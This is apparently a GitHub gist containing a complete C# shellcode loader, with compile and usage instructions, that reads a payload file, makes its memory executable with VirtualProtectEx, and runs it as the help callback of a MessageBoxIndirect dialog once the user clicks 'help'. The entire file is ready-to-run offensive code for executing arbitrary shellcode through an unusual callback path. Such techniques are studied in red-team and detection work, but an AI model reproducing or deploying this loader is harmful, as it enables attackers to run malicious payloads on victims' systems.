Created
March 7, 2022 16:57
-
-
Save rmusser01/920bb4af53860464bcb20e0ecc516614 to your computer and use it in GitHub Desktop.
Click help in a message box to execute shellcode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//Compile: PS C:\> C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe .\mboxexecute.cs | |
//Usage: PS C:\> .\mboxexecute.exe <path to shellcode> | |
//References: | |
// https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-messageboxindirecta | |
// https://docs.microsoft.com/en-us/windows/win32/api/winuser/ns-winuser-msgboxparamsa | |
using System; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
namespace mboxexecute | |
{ | |
class Program | |
{ | |
static void Main(string[] args) | |
{ | |
if (args.Length == 0) | |
{ | |
Console.WriteLine("\n[*] Specify the filepath to shellcode.\n"); | |
Environment.Exit(0); | |
} | |
byte[] payload = File.ReadAllBytes(args[0]); | |
GCHandle pinnedPayload = GCHandle.Alloc(payload, GCHandleType.Pinned); | |
uint oldProtect = 0; | |
if (VirtualProtectEx(GetCurrentProcess(), pinnedPayload.AddrOfPinnedObject(), (UIntPtr)payload.Length, 0x20/*RX*/, out oldProtect)) | |
{ | |
MSGBOXPARAMS boxParams = new MSGBOXPARAMS(); | |
boxParams.dwStyle = (uint)(0x00004000L); // Should have an ok button and a help button | |
boxParams.lpfnMsgBoxCallback = pinnedPayload.AddrOfPinnedObject(); // "A pointer to the callback function that processes help events for the message box." *chef's kiss* | |
boxParams.cbSize = (uint)Marshal.SizeOf(boxParams); | |
int mboxResponse; | |
do | |
{ | |
mboxResponse = MessageBoxIndirect(boxParams); | |
} while (mboxResponse == 1); // Just keep looping until the user clicks "help" | |
Environment.Exit(0); | |
} | |
else | |
{ | |
Console.WriteLine(" [!] VirtualProtectEx failed."); | |
} | |
} | |
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] | |
public static extern int MessageBoxIndirect(MSGBOXPARAMS lbmp); | |
[DllImport("kernel32.dll")] | |
static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); | |
[DllImport("kernel32.dll", SetLastError = true)] | |
public static extern IntPtr GetCurrentProcess(); | |
[StructLayout(LayoutKind.Sequential)] | |
public struct MSGBOXPARAMS | |
{ | |
public uint cbSize; | |
public IntPtr hwndOwner; | |
public IntPtr hInstance; | |
public string lpszText; | |
public string lpszCaption; | |
public uint dwStyle; | |
public IntPtr lpszIcon; | |
public IntPtr dwContextHelpId; | |
public IntPtr lpfnMsgBoxCallback; | |
public uint dwLanguageId; | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment